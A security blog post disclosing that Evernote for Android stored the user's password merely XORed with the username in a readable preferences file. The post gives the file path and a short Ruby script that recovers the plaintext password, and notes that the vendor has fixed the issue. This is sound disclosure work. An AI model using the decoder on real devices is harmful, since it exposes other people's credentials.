Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Evernote: XOR & Passwords

Update: Evernote has reported that this issue has been addressed.

Evernote for Android stores various settings in an XML, this file though isn’t really protected – it’s easily readable, especially if an attacker is able to get physical access to a device, what’s worse is that it contains the user’s credentials.

/data/data/com.evernote/shared_prefs/com.evernote_preferences.xml

The username in located in the <string name="username"> element, and the password is stored in <string name="encrypted_password"> – from the name you’d assume that the password is actually encrypted. You’d be wrong.

The password is simply XORed with the username, making recovery simple.

Here’s a simple script to “decrypt” the password:

#!/usr/bin/env ruby

##
# Copyright 2013 Adam Caudill &lt;adam@adamcaudill.com&gt;
#
# Decodes Evernote password recovered from Evernote for Android config file:
# File: /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
#   (may also be in &lt;userid&gt;.prof.xml if missing from com.evernote_preferences.xml)
# Password: &lt;string name="encrypted_password"&gt;
# Username: &lt;string name="username"&gt;
##

require "base64"

if ARGV.count != 2
  puts 'Usage: ./evernote_pass_decode.rb &lt;pass&gt; &lt;username&gt;'
end

pass = Base64.decode64(ARGV[0])
user = ARGV[1]
final = ''

pass.bytes.each_with_index do |byte, index|
  final += (byte ^ user[index % user.length].unpack('c')[0]).chr
end

puts "Password: #{final}"

Adam Caudill


Related Posts

  • Evernote for Windows, Arbitrary File Download via Update

    Update: The Evernote security has reported that this issue is resolved. Evernote for Windows downloads its update information via HTTP, making it subject to man-in-the-middle attacks – further, this allows an attacker to specify an arbitrary file for the updater to download. The good news is that Evernote will not execute the file thanks to signature validation – but the file isn’t removed, so it’s available for later use. As the file isn’t executed, it isn’t a critical issue.

  • Win by Building for Failure

    Systems fail; it doesn’t matter what the system is. Something will fail sooner or later. When you design a system, are you focused on the happy path, or are you building with the possibility of failure in mind? If you suffered a data breach tomorrow, what would the impact be? Does the system prevent loss by design, or does it just fall apart? Can you easily minimize loss and damage, or would an attacker have free rein once they get in?

  • On Apple, Privacy, and Device Control

    If you’ve bothered to look at Twitter or any technology news source, you’ve seen that Apple made a major announcement: Expanded Protections for Children. This has been written about by countless outlets, so I’ll assume you’re familiar with the basics. The announcement covered a few new features being added to the next version of Apple’s operating systems, namely: Scanning of inbound and outbound messages for sexually explicit images. Scanning images being uploaded to iCloud for CSAM.

  • Breaking the NemucodAES Ransomware

    The Nemucod ransomware has been around, in various incarnations, for some time. Recently a new variant started spreading via email claiming to be from UPS. This new version changed how files are encrypted, clearly in an attempt to fix its prior issue of being able to decrypt files without paying the ransom, and as this is a new version, no decryptor was available1. My friends at Savage Security contacted me to help save the data of one of their clients; I immediately began studying the cryptography related portions of the software, while the Savage Security team was busy looking at other portions.

  • Confide, Screenshots, and Imaginary Threats

    Recently Vice published a story about a lawsuit against the makers of the ‘secure’ messaging application Confide. This isn’t just a lawsuit, it’s a class-action lawsuit and brought by Edelson PC – an amazingly successful (and sometimes hated1) law firm – this isn’t a simple case. The complaint includes a very important point: Specifically, Confide fails to deliver on two of the three requirements that it espouses as necessary for confidential communications: ephemerality and screenshot protection.